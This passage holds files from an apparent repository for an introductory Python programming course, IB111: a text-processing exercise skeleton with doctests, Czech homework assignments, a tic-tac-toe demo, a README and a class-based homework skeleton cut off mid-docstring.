"text": "\"\"\"Week 11: Text processing and data analysis.\n\nAssumes the following files in the same directory as this script:\n- 'alice-in-wonderland.txt': https://github.com/effa/ib111/week11/alice-in-wonderland.txt\n- 'devatero-pohadek.txt': https://github.com/effa/ib111/week11/devatero-pohadek.txt\n\nEdit the last two lines of this script to run either main() or test().\n- test() runs provided doctests, shows errors (or nothing if everything works)\n- main() runs any manual tests and print results\n\"\"\"\nimport re\nfrom random import randint\n\n\ndef to_words(text):\n \"\"\"Return a list of lower-cased words without interpunction.\n\n >>> to_words('A rabbit, a cat, and an eagle!')\n ['a', 'rabbit', 'a', 'cat', 'and', 'an', 'eagle']\n \"\"\"\n text = text.lower()\n # Use regular expressions to replace all non-word characters by spaces.\n text_without_interpuction = re.sub('[\\W_]', ' ', text)\n words = text_without_interpuction.split()\n return words\n\n\n# ------------- Task 11.1 --------------\n\ndef average_word_length(book):\n \"\"\"Return average legnth of a word in a given book.\n\n >>> average_word_length('alice-in-wonderland.txt')\n 3.93...\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.2 --------------\n\ndef save_words_sorted_alphabetically(book, output_filename='words.txt'):\n \"\"\"Save all words from the book sorted alphabetically to a new file.\n\n >>> save_words_sorted_alphabetically('alice-in-wonderland.txt')\n >>> with open('words.txt', 'r') as infile:\n ... print(infile.read().split()[:5])\n ['a', 'abide', 'able', 'about', 'above']\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.3 --------------\n\ndef save_words_sorted_by_length(book, output_filename='words.txt', min_length=3):\n \"\"\"Save words having at least `min_length` letters sorted by length.\n\n >>> save_words_sorted_by_length('alice-in-wonderland.txt')\n \"\"\"\n # TODO\n pass\n\n\ndef save_words_sorted_by_length_alphabetically(book, output_filename='words.txt', min_length=3):\n \"\"\"Save words having at least `min_length` letters sorted by length.\n\n Words with the same length are sorted alphabetically.\n\n >>> save_words_sorted_by_length_alphabetically('alice-in-wonderland.txt')\n >>> with open('words.txt', 'r') as infile:\n ... print(infile.read().split()[:5])\n ['act', 'ada', 'age', 'ago', 'air']\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.4 --------------\n\ndef print_longest_words_in_book(book, n=5):\n \"\"\"Compute n longest words and print them ordered by their length.\n\n Each word appears at most once in the list.\n Words with the same length are sorted alphabetically.\n\n >>> print_longest_words_in_book('alice-in-wonderland.txt', n=5)\n affectionately\n contemptuously\n disappointment\n multiplication\n circumstances\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.5 --------------\n\ndef most_frequent_words_in_text(text, n=10, min_length=3):\n \"\"\"Compute n most frequent words and print them ordered by frequency.\n\n >>> most_frequent_words_in_text(\n ... 'A rabbit, a cat, an eagle, a rabbit, a cat, a rabbit and a rabbit!',\n ... 
n=2, min_length=3)\n rabbit 4\n cat 2\n \"\"\"\n # TODO\n pass\n\n\ndef most_frequent_words_in_book(book, n=10, min_length=3):\n \"\"\"Compute n most frequent words and print them ordered by frequency.\n\n Hint: Use most_frequent_words_in_text().\n\n >>> most_frequent_words_in_book('alice-in-wonderland.txt', n=4, min_length=5)\n alice 398\n little 128\n there 99\n about 94\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.6 --------------\n\ndef compute_next_tokens_map(text):\n \"\"\"Return a dictionary mapping tokens to list of next tokens.\n\n >>> next_tokens = compute_next_tokens_map('A rabbit, a rabbit, and a cat!')\n >>> next_tokens['a']\n ['rabbit,', 'cat!']\n >>> next_tokens['rabbit,']\n ['a', 'and']\n >>> next_tokens['cat!']\n []\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.7 --------------\n\ndef compute_first_tokens(text):\n \"\"\"Return a list of tokens that could appear at the beginning of a sentence\n\n >>> compute_first_tokens('First sentence. Another sentence? Yes!')\n ['First', 'Another', 'Yes!']\n \"\"\"\n # Very simple heuristic: Just take tokens with upper-cased first letter.\n tokens = text.split()\n first_tokens = [token for token in tokens if token[0].isupper()]\n return first_tokens\n\n\ndef select_random(tokens):\n \"\"\"Return a random token from a list of tokens.\n\n >>> select_random(['single'])\n 'single'\n \"\"\"\n # TODO\n pass\n\n\nBOOKS = {\n 'carroll': 'alice-in-wonderland.txt',\n 'capek': 'devatero-pohadek.txt',\n}\n\n\ndef imitate(author, n_words=50):\n \"\"\"Generate new bestseller of given author generated on demand.\n\n Args:\n author: one of {'carroll', 'capek'}\n n_words: How many words to generate.\n\n Return:\n Generated text.\n\n Hints:\n Use compute_next_tokens_map(), compute_first_tokens(), select_random()\n and BOOKS dictionary.\n\n >>> generated_text = imitate('carroll')\n \"\"\"\n # TODO\n pass\n\n\n# ------------- Task 11.8 --------------\n\ndef imitate_sentences(author, n_sentences=10):\n \"\"\"Generate n sentences imitating given author.\n\n Ideas for improvements (you can focus on Czech/English only):\n - use 2 previous tokens to select the new one\n - use 1-5 previous tokens (randomly) to select the new one\n - randomly insert sometimes words/sentences from recipes/textbooks\n - randomly replace some names/pronouns with names of your friends\n \"\"\"\n pass\n\n\n# ------------- main and test --------------\n\ndef main():\n print('\\nCarroll:\\n')\n print(imitate('carroll'))\n print('\\nCapek:\\n')\n print(imitate('capek'))\n\n\ndef test():\n \"\"\"Check examples in docstrings.\n\n If the actual output matches the expected output, doesn't print anything.\n Otherwise, it prints an error message showing the mismatch.\n \"\"\"\n import doctest\n doctest.testmod(optionflags=doctest.ELLIPSIS)\n\n\nif __name__ == '__main__':\n #main()\n test()\n"
},
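Most of the TODOs in the week-11 skeleton above reduce to the provided `to_words` helper plus `collections.Counter`. As an illustration, here is one way Task 11.5 could be filled in so that its doctest passes; this is a sketch with `to_words` inlined to keep it self-contained, not the course's reference solution.

```python
import re
from collections import Counter


def to_words(text):
    """Lower-case the text and split it into words without interpunction."""
    return re.sub(r'[\W_]', ' ', text.lower()).split()


def most_frequent_words_in_text(text, n=10, min_length=3):
    """Print the n most frequent words of at least min_length letters."""
    words = [w for w in to_words(text) if len(w) >= min_length]
    for word, count in Counter(words).most_common(n):
        print(word, count)


most_frequent_words_in_text(
    'A rabbit, a cat, an eagle, a rabbit, a cat, a rabbit and a rabbit!',
    n=2, min_length=3)
# rabbit 4
# cat 2
```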
{
"alpha_fraction": 0.7543942928314209,
"alphanum_fraction": 0.7738717198371887,
"avg_line_length": 55.89189147949219,
"blob_id": "cd93c8487f0e9354f988313b1c7b50ff052a5414",
"content_id": "05d3d42e3267b292f870ea73a70bdbc6d24d9c39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2293,
"license_type": "no_license",
"max_line_length": 381,
"num_lines": 37,
"path": "/homeworks/homework_03.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 3\n* soft deadline je 12. 11., nejpozději však odevzdávejte do 19. 11.\n* úloha je za 30 bodů\n* odevzdávejte jeden soubor pojmenovaý `homework_03.py`\n* odevzdávárna [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 3](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw3/)\n* nezapomeňte program psát pěkně, hezky dělit na funkce a rozumně komentovat\n\n## Connect four\nTentokrát budete programovat [Connect four](https://cs.wikipedia.org/wiki/Cestovní_piškvorky) (také známé jako padající nebo cestovní piškvorky).\n\n### Pravidla\nHru hrají dva hráči, kteří střídavě do hracího pole umisťují svoje hrací kameny (v našem případě označené X a O). Hráč, který dostane 4 své hrací kameny do řady, sloupce nebo diagonály vyhrál. Hráči ovšem vybírají pouze sloupec, do kterého kámen umístí a ten \"spadne\" na nejnižší prázdné místo v daném sloupci. Pokud je hrací pole zaplněné a žádný z hráčů nevyhrál, nastává remíza.\n\n### Poznamky\n* herní pole si reprezentujte jako pole polí po řádcích\n* pro lidského hráče vypisujte nějaký dotaz na zadání sloupce\n* pro počítačového hráče nejdříve implementujte strategii, která hraje náhodně, lepší můžete udělat později\n* [tady](https://github.com/effa/ib111/blob/master/ticTacToe.py) máte kód na piškvorky, který jsme si ukazovali na cviku\n\n### Kostra\n* [kostra](homework_03.py)\n* v kostře máte předdefinované hlavičky několika funkcí, ale určitě můžete (a měli byste) si dělat i nějaké pomocné funkce\n* nemusíte se omezovat na `human_play` a `computer_play`, můžete si naprogramovat i další (např. `better_computer_play`)\n\n### Příklad výpisu stavu hry\n```\n X\n X O\n O X O\n_ _ _ _\n1 2 3 4\n```\n\n### Bonus\nBonusem k této úloze na naimplementovat nějakou jinou než náhodnou strategii. Funkci se strategií pojmenujte `bonus_play` a stejně jako ostatní funkce pro hráče bude brát stav hry, číslo hráče a bude vracet číslo sloupce.\n\nBonus pro tuto úlohu je zajímavý tím, že část bonusových bodů dostanete za samotnou implementaci a část soutěžením se strategiemi ostatních. Vyhodnocení soutěžní části si potom uděláme na cvičení po hard deadlinu.\n"
},
{
"alpha_fraction": 0.4446428716182709,
"alphanum_fraction": 0.4616071283817291,
"avg_line_length": 23.34782600402832,
"blob_id": "cfa9758d9ff9ea0918cefeb1134e77e8d8aa201d",
"content_id": "c07f1253847753dbc04b6f15f595a54a54f30dce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1120,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 46,
"path": "/ticTacToe.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "N = 3\ndef empty_plan():\n return [[0 for i in range(N)]\n for j in range(N)]\n \n\ndef determine_winner(plan):\n for i in range(N):\n all_same = True\n for j in range(N):\n if plan[i][j] != plan[i][0]:\n all_same = False\n if all_same and plan[i][0] != 0:\n return plan[i][0]\n \n all_same = True\n for j in range(N):\n if plan[j][i] != plan[0][i]:\n all_same = False\n if all_same and plan[0][i] != 0:\n return plan[0][i]\n return 0\n\n\ndef print_plan(plan):\n symbol = {0: \".\", 1: \"X\", 2: \"O\"}\n for i in range(N):\n for j in range(N):\n print(symbol[plan[i][j]], end=\" \")\n print()\n \n \ndef play():\n plan = empty_plan()\n player = 1\n while determine_winner(plan) == 0:\n print_plan(plan)\n move = input(\"Player \"+str(player)+\" move:\")\n x, y = list(map(int, move.split(\" \")))\n plan[y-1][x-1] = player\n player = 3 - player\n print_plan(plan)\n print(\"Player \"+str(determine_winner(plan))+\" wins.\")\n\n \nplay()\n"
},
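Note that `determine_winner` in the demo above only scans rows and columns, so a diagonal three-in-a-row is never detected. If full tic-tac-toe rules are wanted, a check along these lines can be or-ed into the result; the helper below is hypothetical (same 0/1/2 board encoding, same `N`), not part of the course code.

```python
N = 3


def determine_diagonal_winner(plan):
    """Return the player occupying a full diagonal, or 0 if there is none."""
    main = [plan[i][i] for i in range(N)]
    anti = [plan[i][N - 1 - i] for i in range(N)]
    for diagonal in (main, anti):
        if diagonal[0] != 0 and all(cell == diagonal[0] for cell in diagonal):
            return diagonal[0]
    return 0


print(determine_diagonal_winner([[1, 0, 2],
                                 [0, 1, 2],
                                 [0, 0, 1]]))  # 1
```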
{
"alpha_fraction": 0.718898594379425,
"alphanum_fraction": 0.7421777248382568,
"avg_line_length": 33.43965530395508,
"blob_id": "9de535fbac44224801b4cb771005d2c1bda0449f",
"content_id": "ffc76c82cd45c2e3ae2d637565c2703c45f26c1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4358,
"license_type": "no_license",
"max_line_length": 511,
"num_lines": 116,
"path": "/homeworks/homework_05.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 5: Text a obrázky\n* Termín odevzdání: neděle 17. 12 (soft deadline).\n* Pro případ nouze bude odevzdávárna otevřená až do středy 27. 12. (hard deadline).\n* Odevzdejte jediný soubor `homework_05.py`.\n* Odevzdávárna:\n [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 5](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw5/)\n* Pište přehledný kód, používejte vhodná jména proměnných, odstraňte duplicitní kód.\n* Případné složitější konstrukce opatřete komentářem.\n* Nepoužívejte diakritiku (ani v komentářích).\n* Úlohu vypracujte zcela samostatně.\n* Řešení domácí úlohy si užijte :-)\n\n## Zadání\n\nTato úloha nemá kostru a je zadána částečně otevřeně, abyste se mohli zaměřit na to, co vám přijde zajímavé. Za skvělé řešení můžete získat i bonusové body.\nDo komentářů uveďte, jakým způsobem či v jakém rozsahu jednotlivé úlohy řešíte\na na konec připojte i ukázková volání.\n\n### Analýza křestních jmen (5 bodů)\n\nVyužijte soubor s anglickými jmény [names.txt](./names.txt).\nVypočítejte, kolik jmen začíná na které písmeno\na vypište tyto počte sestupně:\n\n```\nM : 487\nL : 430\nC : 413\nA : 394\n...\n```\n\nDále pomocí textové grafiky vykreslete graf četností\n(písmena na x-ové ose opět seřaďte sestupně podle četností).\nVýsledek může vypadat nějak takto:\n\n```\n500 #\n450 ##\n400 #####\n350 ######\n300 #######\n250 ###########\n200 ############\n150 ###############\n100 ####################\n 50 #######################\n MLCASJDRETKBGNHVFPWIOYZQUX\n```\n\n\n### Hledání jména pro potomka (5 bodů)\n\nNapište funkci `find_name_for_your_child()`,\nkterá pomůže interaktivně vybrat vhodné jméno (případně více jmen) pro dítě pomocí několika otázek, např.:\n* jaké má být první písmeno\n* maximální délka jména\n* minimální počet samohlásek\n* maximální počet různých písmen\n* obsahující nějaké požadované písmeno alespoň N-krát\n* ...\n\nImplementujte alespoň 3 kritéria (dekomponujte je do pomocných funkcí).\nFunkce `find_name_for_your_child()` se postupně zeptá na tato kritéria\na měla by umožnit kritérium přeskočit, pokud pro uživatele není důležité.\nNakonec vypíše všechna jména, která splňují všechna zadaná kritéria,\nseřazená abecedně.\n\n\n### Rozmazání obrázku (5 bodů)\n\nNapiště funkci `blur(filename='landscape.jpg', radius=4)`, která daný obrázek rozmaže a ukáže výsledek. Funkce bere jako parametry cestu ke zdrojovému obrázku a míru rozmazání. Výsledek může vypadat následovně:\n\n\n\n\n### Prolnutí obrázků (5 bodů)\n\nNapiště funkci `combine(left='left.jpg', right='right.jpg')`,\nkterá nějakým způsobem skombinuje dva obrázky (stejné velikosti) do jednoho,\nnapříklad plynulým přechodem od jednoho ke druhému:\n\n\n\n\n### Funkční krajina (5 bodů)\n\nNapište funkci `draw_function(function, size=200)`, která vykreslí předanou funkci `function` na intervalu od -1 do 1 (rozsah zobrazovaných funkčních hodnot bude také od -1 do 1) na obrázek o šířce i výšce `size` pixelů například tak, že všechny body pod hodnotou dané funkce se vybarví černě a všechny body nad bíle.\nZkuste pak pomocí této funkce vykreslit co nejroztodivnější krajinu.\n(Tip na možná rozšíření: barevné gradienty, nebe, stromky.)\n\n\n```\ndef linear(x):\n return 0.5 * x\n\ndef hill(x):\n return (-1) * (x ** 2)\n\ndef draw_landscape(function, size=200):\n pass\n\ndraw_function(linear)\ndraw_function(hill)\n```\n\n\n\n\n\n\n### Želvy (15 bodů)\n\nUdělejte objektovou implementaci želví grafiky s vykreslováním do SVG (na základě kódů uvedených ve slidech k přednášce). 
Implementujte metody pro \"otočení směrem k zadané želvě\" a \"vykreslení spojnice se zadanou želvou\". Za využití těchto metod vytvořte zajímavé obrázky, např. následující (první obrázek je \"želví honička\", kdy několik želv honí jednu, druhý obrázek vznikne tak, že dvě želvy jdou po kružnici, jedna jde rychleji než druhá, pravidelně vykreslujeme spojnice, barvy řešit můžete, ale nemusíte).\n\n\n"
},
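For the blur task in the assignment above, a hand-rolled per-pixel average is presumably the point of the exercise, but Pillow's built-in box blur is a convenient reference to compare one's own output against. A sketch; it assumes Pillow is installed and that the image file from the assignment is present.

```python
from PIL import Image, ImageFilter


def blur(filename='landscape.jpg', radius=4):
    """Box-blur the image and show the result."""
    blurred = Image.open(filename).filter(ImageFilter.BoxBlur(radius))
    blurred.show()
    return blurred
```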
{
"alpha_fraction": 0.6791443824768066,
"alphanum_fraction": 0.7153192758560181,
"avg_line_length": 31.43877601623535,
"blob_id": "c714e6eefec94ce37367dc94a0d66f1138fb2d4b",
"content_id": "61af64df8792f3db5f4d499c57b136a4e362865d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3464,
"license_type": "no_license",
"max_line_length": 373,
"num_lines": 98,
"path": "/homeworks/homework_01.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "# Domácí úloha 1\n\n* Termín odevzdání: neděle 1. 10 (soft deadline). Pro případ nouze bude odevzdávárna otevřená až do 8. 10. (hard deadline). Později už úlohu odevzdat nepůjde.\n* Úloha se skládá z 5 příkladů, za každý můžete získat 5 bodů, takže celkem až 25 bodů.\n* Odevzdejte jediný soubor `homework_01.py` s implementací požadovaných funkcí. Funkce pojmenujte stejně jako v zadání.\n* Můžete použít připravenou [kostru programu](homework_01.py).\n* Odevzdávárna: [IS / Student / FI:IB111 / Odevzdávárny / Domácí úloha 1](https://is.muni.cz/auth/el/1433/podzim2017/IB111/ode/s03/ode_hw1).\n* Pište přehledný kód, používejte vhodná jména proměnných a případné složitější konstrukce opatřete komentářem.\n* Nepoužívejte diakritiku (ani v komentářích).\n* Pokud se vám nějakou úlohu nepodaří úplně vyřešit, tak nezoufejte, zkuste si zadaný problém zjednodušit a vyřešit tento zjednodušený problém. Do komentáře pak napište, v čem zjednodušení spočívá (např. \"Vykresli obdelnik pozadovane velikosti, ale bez pruhu.\") a úplně nejlépe zkuste taky popsat překážku, kvůli které se vám nedaří vyřešit původní problém v plném rozsahu.\n* Úlohy vypracovávejte zcela samostatně.\n* Řešení domácích úloh si užívejte :-)\n\n\n## Alternující posloupnost\n\nNapište funkci `alternating_sequence(n, a, b)`,\nkterá vypíše prvních `n` členů posloupnosti,\nve které se střídají násobky čísla `a` s konstantní hodnotou `b`.\n\n```\ndef alternating_sequence(n, a, b): ...\n\n>>> alternating_sequence(10, 7, 1)\n7 1 14 1 21 1 28 1 35 1\n```\n\n## Vybraná čísla\n\nNapište funkci `selected_numbers(a, b)`,\nkterá vypíše všechna dvojciferná čísla,\njejichž první cifra je dělitelná číslem `a`\na druhá cifra je dělitelná číslem `b`:\n\n```\ndef selected_numbers(a, b): ...\n\n>>> selected_numbers(3, 5)\n30 35 60 65 90 95\n```\n\nTip: Pro spojení dvou podmínek, které musí platit současně, použijte klíčové\nslovo `and`.\n\n## Skorodělitelé\n\nNapište funkci `near_divisors(n)`, která vypíše všechna kladná čísla,\nkterá sice nejsou dělitelé čísla `n`,\nale od některého dělitele čísla `n` se liší pouze o 1.\n\n```\ndef near_divisors(n): ...\n\n>>> near_divisors(20)\n3 6 9 11 19 21\n```\n\nTip: Pro spojení dvou podmínek, ze kterých stačí, aby platila alespoň jedna, použijte klíčové slovo `or`.\n Dejte si pozor na pořadí vyhodnocování u složitějších aritmetických a logických výrazů a využijte závorek k jeho ovlivnění.\n\n## Pruhovaný obdélník\n\nFunkce `striped_rectangle(width, height)` vykreslí pomocí textové grafiky obdélník o zadaných rozměrech,\nkterý bude mít znakově rozlišený okraj, liché řádky a sudé řádky.\n\n```\ndef striped_rectangle(width, height): ...\n\n>>> striped_rectangle(9, 6)\n# # # # # # # # #\n# - - - - - - - #\n# ~ ~ ~ ~ ~ ~ ~ #\n# - - - - - - - #\n# ~ ~ ~ ~ ~ ~ ~ #\n# # # # # # # # #\n```\n\n\n\n## Tabulka rozdílů\n\nFunkce `differences_table(n)` vypíše tabulku s daným počtem řádků a sloupců (+ popisný řádek a sloupec),\nkde v každé buňce se nachází absolutní rozdíl čísla řádku a čísla sloupce.\n(Pro jednoduchost formátování klidně předpokládejte, že `n` je jednociferné.)\n\n\n```\ndef differences_table(n): ...\n\n>>> differences_table(5)\n 1 2 3 4 5\n - - - - -\n1 | 0 1 2 3 4\n2 | 1 0 1 2 3\n3 | 2 1 0 1 2\n4 | 3 2 1 0 1\n5 | 4 3 2 1 0\n```\n"
},
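The near-divisors exercise above ("Skorodělitelé") is stated precisely enough to pin down a solution: collect the divisors, shift each by plus and minus one, and keep the positive results that are not divisors themselves. A possible sketch:

```python
def near_divisors(n):
    """Print positive non-divisors of n that differ by 1 from a divisor of n."""
    divisors = {d for d in range(1, n + 1) if n % d == 0}
    near = {d + step for d in divisors for step in (-1, 1)}
    print(*sorted(x for x in near if x > 0 and x not in divisors))


near_divisors(20)  # 3 6 9 11 19 21
```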
{
"alpha_fraction": 0.5730994343757629,
"alphanum_fraction": 0.6610526442527771,
"avg_line_length": 58.375,
"blob_id": "5038d25fa3c2ce2aba2fc89a284cb618f604969d",
"content_id": "b223336f427234ba78596b1d7abbab08920bcd17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4443,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 72,
"path": "/README.md",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "IB111 Základy programování\n==========================\n\n* [Stránka předmětu](http://www.fi.muni.cz/IB111/)\n* [Sbírka úloh](http://www.fi.muni.cz/IB111/sbirka/)\n\n\nDomácí příprava\n--------------------\n* Každý týden: Vyřešit si samostatně všechny úlohy ze [sbírky](http://www.fi.muni.cz/IB111/sbirka/) k tématu z předchozího týdne.\n Projít si [kontrolní otázky](https://docs.google.com/document/d/19VeL15P5s8rv-YoCMwpIiQD34ptn6bevJKsV7mBD-Uo/view)\n a úvodní text kapitoly sbírky k nadcházejícímu cviku.\n* Občasně: odevzdávané domácí úlohy, viz níže.\n* Podle chuti a potřeby: tutoriály, kurzy a řešení dalších úloh k procvičování, viz níže.\n\nCvičení\n--------------------\n\nNásledující tabulka odkazuje na kapitolu ze [sbírky](http://www.fi.muni.cz/IB111/sbirka/) a hlavní úlohy, kterými je dobré na cvičení začít.\n\n| | Téma | Příklady |\n| --- | --- | --- |\n| 1 | [Želví grafika](http://www.fi.muni.cz/IB111/sbirka/01-zelvi_grafika.html) | 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2.1, 1.2.2 |\n| 2 | [Základní struktury](http://www.fi.muni.cz/IB111/sbirka/02-zakladni_struktury.html) | 2.1.1, 2.1.2, 2.1.4, 2.2.1, 2.3.1, 2.3.5 |\n| 3 | [Jednoduché výpočty](http://www.fi.muni.cz/IB111/sbirka/03-jednoduche_vypocty.html) | 3.1.1, 3.1.3, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.2.8, 3.2.10, 3.2.12, 3.3.2 |\n| 4 | [Náhodná čísla](http://www.fi.muni.cz/IB111/sbirka/04-nahodna_cisla.html) | 4.1.1, 4.1.3, 4.1.6, 4.2.1, 4.2.2 |\n| 5 | [Řetězce a seznamy](http://www.fi.muni.cz/IB111/sbirka/05-retezce_a_seznamy.html) | 5.1.1, 5.1.3, 5.2.1, 5.2.5, 5.2.6, 5.2.8, 5.3.1 |\n| 6 | [Binární vyhledávání](http://www.fi.muni.cz/IB111/sbirka/06-binarni_vyhledavani.html) | 6.1.1, 6.1.2, 6.2.1, 6.2.2, 6.2.3 |\n| 7 | [Algoritmy nad seznamy](http://www.fi.muni.cz/IB111/sbirka/07-seznamy_algoritmy.html) | vnitrozávod, 7.2.1, 7.2.2, 7.2.3, (7.1.3) |\n| 8 | [Datové struktury](http://www.fi.muni.cz/IB111/sbirka/09-datove_struktury.html) | 9.1.1, 9.2.2, 9.3.2, tic-tac-toe |\n| 9 | [Rekurze](http://www.fi.muni.cz/IB111/sbirka/08-rekurze.html) | 8.1.1, 8.1.2, 8.1.4, 8.2.1, 8.3.1, 8.3.2, 8.3.3 |\n| 10 | [Objekty](https://www.fi.muni.cz/IB111/sbirka/10-objekty_a_tridy.html) | 10.1.2, 10.1.3, 10.2.1, 10.2.7 |\n| 11 | [Zpracování textu](./week11/week11.py) | 11.1, 11.2, 11.3, 11.4, 11.5, 11.6, 11.7 |\n| 12 | Vnitrosemestrální test | (druhý) |\n| 13 | [Bitmapová grafika](https://www.fi.muni.cz/IB111/sbirka/12-bitmapova_grafika.html) | 12.1.1, 12.1.6, 12.2.1, 12.2.3, 12.2.4., 12.1.7, (12.1.9, 12.1.10) |\n\nDomácí úlohy\n------------\n\nTabulka odkazuje na zadání domácích úloh a uvádí termín odevzdání (soft deadline).\nPro případ nouze bude každou domácí úlohu možné odevzdat ještě během týdne následujícího po tomto termínu.\n\n| | Zadání | Odevzdání |\n| --- | --- | --- |\n| 1 | [Posloupnosti a obrázky](homeworks/homework_01.md) | neděle 1. 10. |\n| 2 | [1D hra](homeworks/homework_02.md) | neděle 15. 10. |\n| 3 | [2D hra](homeworks/homework_03.md) | neděle 12. 11. |\n| 4 | [Objekty](homeworks/homework_04.md) | neděle 3. 12. |\n| **5** | **[Text a obrázky](homeworks/homework_05.md)** | **neděle 17. 
12.** |\n\nTutoriály, kurzy a hry\n----------------------\n* [Tutoriál z dokumentace Pythonu](https://docs.python.org/3/tutorial/index.html)\n* [Česká učebnice programování v Pythonu](http://howto.py.cz/index.htm)\n* [An Introduction to Interactive Programming in Python (Rice University)](https://www.coursera.org/course/interactivepython)\n* [CheckiO - učení (počítačovou) hrou](http://www.checkio.org/)\n* [Code Combat](http://codecombat.com/)\n\nÚlohy k procvičování\n--------------------\n* [Seznam úloh na 1. vnitro](https://docs.google.com/document/d/1j6eVw1q_UNWmbDjoUUketnJ0QoJdHz5pRoSjR_YHiyo)\n* [Programátorská cvičebnice](http://www.radekpelanek.cz/?progcvic)\n* [HackerRank – programming challanges](https://www.hackerrank.com)\n* [Problem Solving Tutor](http://tutor.fi.muni.cz/)\n* [Python Challange](http://www.pythonchallenge.com/)\n* [Project Euler](http://projecteuler.net/)\n\nMotivace\n--------\n* [Motivační video o programování](https://www.youtube.com/watch?v=nKIu9yen5nc)\n* [What is Programming? (Khan Academy)](https://www.khanacademy.org/computing/cs/programming/intro-to-programming/v/programming-intro)\n* [Výroky slavných osobností o programování](http://code.org/quotes)\n"
},
{
"alpha_fraction": 0.5507215261459351,
"alphanum_fraction": 0.5741534233093262,
"avg_line_length": 26.393346786499023,
"blob_id": "210441140edd4c41c580c421b05aab9e4b7819cb",
"content_id": "fec647084db358e10b242425ae98c6b4b651f827",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13998,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 511,
"path": "/homeworks/homework_04.py",
"repo_name": "effa/ib111",
"src_encoding": "UTF-8",
"text": "class Person:\n \"\"\"Represents a member of the association.\n\n Attributes:\n name: string\n year_of_birth: int\n degree: one of 'bc', 'mgr', 'phd'\n mentor: another Person who is the mentor of this person\n mentees: list of Persons, direct mentees of this person\n \"\"\"\n def __init__(self, name, year_of_birth, degree):\n \"\"\"Initialize new Person object.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> martin.name\n 'Martin'\n >>> martin.year_of_birth\n 1991\n >>> martin.degree\n 'phd'\n \"\"\"\n # TODO\n pass\n\n def describe(self):\n \"\"\"Return string representation of this person.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> martin.describe()\n 'Martin (1991)'\n \"\"\"\n # TODO\n pass\n\n\nclass Team:\n \"\"\"Represents a group of people working together on one event.\n\n Attributes:\n name: string, name of the event\n members: list of Persons working on this event\n \"\"\"\n def __init__(self, name):\n \"\"\"Initialize new Team object.\n\n >>> team = Team('InterJeLen')\n >>> team.name\n 'InterJeLen'\n >>> team.members\n []\n \"\"\"\n # TODO\n pass\n\n def add_member(self, member):\n \"\"\"Add new member to this team.\n\n >>> team = Team('InterJeLen')\n >>> dominika = Person('Dominika', 1995, 'bc')\n >>> team.add_member(dominika)\n >>> [member.name for member in team.members]\n ['Dominika']\n \"\"\"\n # TODO\n pass\n\n\ndef create_mentorship(mentor, mentee):\n \"\"\"Create new relationship between a mentor and a mentee.\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> create_mentorship(martin, tom)\n >>> tom.mentor.name\n 'Martin'\n >>> [mentee.name for mentee in martin.mentees]\n ['Tom']\n \"\"\"\n # TODO\n pass\n\n\ndef get_longest_name(people):\n \"\"\"Return longest name among all people.\n\n Args:\n people: dictionary mapping names to Persons\n Returns:\n the longest name (string)\n\n >>> people = {}\n >>> people['martin'] = Person('Martin', 1991, 'phd')\n >>> people['honza'] = Person('Honza', 1995, 'bc')\n >>> get_longest_name(people)\n 'Martin'\n \"\"\"\n # TODO\n pass\n\n\ndef get_founder(people):\n \"\"\"Return a person without a mentor.\n\n In the association, there should be only one person without a mentor, this\n person is called `founder`. This function finds and returns the founder.\n\n Args:\n people: dictionary mapping names to Persons\n\n Returns:\n Person without a mentor\n\n >>> martin = Person('Martin', 1991, 'phd')\n >>> tom = Person('Tom', 1993, 'mgr')\n >>> create_mentorship(martin, tom)\n >>> people = {'martin': martin, 'tom': tom}\n >>> founder = get_founder(people)\n >>> founder.name\n 'Martin'\n \"\"\"\n # TODO\n pass\n\n\ndef print_mentorship_tree(people):\n \"\"\"Print tree of mentorship, see the example below.\n Indents each level by 2 spaces. 
